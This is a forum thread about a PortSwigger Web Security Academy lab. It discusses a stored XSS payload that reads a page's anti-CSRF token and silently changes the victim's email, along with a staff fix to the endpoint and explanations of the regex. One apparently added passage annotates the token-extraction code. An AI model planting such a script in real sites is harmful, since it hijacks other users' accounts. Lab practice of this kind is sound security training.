The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Web Security Academy - Exploiting XSS to perform CSRF

Pelumi | Last updated: Jun 06, 2019 10:02PM UTC

I am having trouble determining where to put the token within the payload given in the solution:

    <script>
    var req = new XMLHttpRequest();
    req.onload = handleResponse;
    req.open('get','/email',true);
    req.send();
    function handleResponse() {
        var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
        var changeReq = new XMLHttpRequest();
        changeReq.open('post', '/email', true);
        changeReq.send('csrf='+token+'&email=test@test.com')
    };
    </script>

Am I supposed to replace (\w+)?

PortSwigger Agent | Last updated: Jun 07, 2019 01:58PM UTC

That code will automatically fetch the anti-CSRF token and include it in the second request. Try submitting it as a blog comment. If that doesn't work, drop us a line.

Burp User | Last updated: Jun 11, 2019 12:57AM UTC

I've tried multiple times to submit the code as a blog comment but I keep getting the 'Thank you for your comment' page with the lab unsolved.

Burp User | Last updated: Jun 11, 2019 01:53AM UTC

I copied the code and inserted into a blog comment verbatim.

PortSwigger Agent | Last updated: Jun 11, 2019 09:32AM UTC

We've just spotted there is a typo in the solution. The line:

    changeReq.open('post', '/email', true);

should be:

    changeReq.open('post', '/email/change', true);

We will get this fixed in the coming days, but for now you can manually do this.

Burp User | Last updated: Jun 11, 2019 02:19PM UTC

Thanks much.

Methoros | Last updated: Apr 28, 2020 11:17AM UTC

Wanted to ask as I haven't been able to find the answer. In this portion of the code below:

    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];

What is the [1] for? Is it to search for the number 1 of an array value 1? JavaScript is 0 based, so what is the [1] for?

Hannah, PortSwigger Agent | Last updated: Apr 30, 2020 11:20AM UTC

Hi,

In this function, we are using regex matching. With regex, you provide a pattern in between slashes, like /foo/, and then match against a string like "foo bar". A match object is returned, so if the match object variable name is "m":

    m[0] == "foo"

If you use a pattern like /foo (bar)/ against "foo bar", the parentheses provide a "submatch".

/foo (bar)/ against "foo bar":

    m[0] == "foo bar"
    m[1] == "bar"

/(foo) (bar)/ against "foo bar":

    m[0] == "foo bar"
    m[1] == "foo"
    m[2] == "bar"

Therefore, we use the [1] to retrieve the value of the csrf token that is contained within the parentheses, rather than the whole string.

Aakash | Last updated: Apr 22, 2021 10:03AM UTC

    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];

Can anyone explain step by step what exactly the regex is doing? Why this particular sequence of slashes (backward and then forward), the + sign, the w?

Hannah, PortSwigger Agent | Last updated: Apr 22, 2021 10:28AM UTC

The two forward slashes in the "match" function denote the start and end of the regular expression.

For a step-by-step breakdown of a regular expression, I would recommend pasting the expression (/name="csrf" value="(\w+)"/) into an online tool, like RegExr - it's really handy for breaking down the different components to help you understand what's going on!
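As an added example, not code from the lab solution or from anyone in this thread, the snippet below illustrates both Hannah's explanation of m[0] versus m[1] and the piece-by-piece breakdown of the regex asked for above. The HTML response body and the token value in it are constructed for the example, and the function names (matchCsrf, buildChangeBody, captureGroups) are my own, not part of the lab.

```javascript
// Constructed stand-in for the HTML that the first (GET) request returns
// to the victim's browser. The token value is made up for this example.
const SAMPLE_RESPONSE = [
  '<form action="/email/change" method="POST">',
  '  <input type="hidden" name="csrf" value="a1B2c3D4e5F6g7H8">',
  '  <input type="email" name="email" value="wiener@normal-user.net">',
  '</form>',
].join("\n");

// The same pattern as the lab payload. Reading it left to right:
//   /  ...  /            the forward slashes delimit a JavaScript regex literal
//   name="csrf" value="  literal text that must appear verbatim in the HTML
//   (\w+)                a capture group; \w is the class [A-Za-z0-9_] (the
//                        backslash makes it a class rather than the letter w)
//                        and + means "one or more" of those characters
//   "                    the closing quote that ends the value attribute
const CSRF_RE = /name="csrf" value="(\w+)"/;

// Returns the whole match (index 0) and the capture group (index 1) side by
// side so the difference Hannah describes can be inspected directly.
// String.prototype.match returns null when nothing matches; the lab payload's
// bare `.match(...)[1]` would throw a TypeError in that case, so it is
// handled here instead.
function matchCsrf(html) {
  const m = html.match(CSRF_RE);
  if (m === null) {
    return null;
  }
  return { whole: m[0], token: m[1] };
}

// What the lab payload does with the token: build the body of the second
// (POST) request. The lab concatenates the raw values; this version
// URL-encodes them, which is what a form submission would do.
function buildChangeBody(html, newEmail) {
  const m = matchCsrf(html);
  if (m === null) {
    throw new Error("no CSRF token found in the response");
  }
  return "csrf=" + encodeURIComponent(m.token) +
         "&email=" + encodeURIComponent(newEmail);
}

// Generic helper for experimenting with Hannah's /foo (bar)/ examples:
// returns [wholeMatch, group1, group2, ...] or null when there is no match.
function captureGroups(re, text) {
  const m = text.match(re);
  return m === null ? null : Array.from(m);
}

// Usage (assumed values, not lab output):
//   matchCsrf(SAMPLE_RESPONSE).token          -> "a1B2c3D4e5F6g7H8"
//   captureGroups(/(foo) (bar)/, "foo bar")    -> ["foo bar", "foo", "bar"]
```

One practical caveat this shows: \w does not match '-' or '+', so a token alphabet that includes such characters would make the capture group stop early, and if the fetched page does not contain the expected markup at all, the unguarded `[1]` in the lab payload throws in the victim's browser and the second request is never sent.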

Muhammed | Last updated: Jul 08, 2021 07:14PM UTC

i wonder how is it sending the request with csrf token and we didn't use the var token after assigning it ?

Hannah, PortSwigger Agent | Last updated: Jul 12, 2021 08:50AM UTC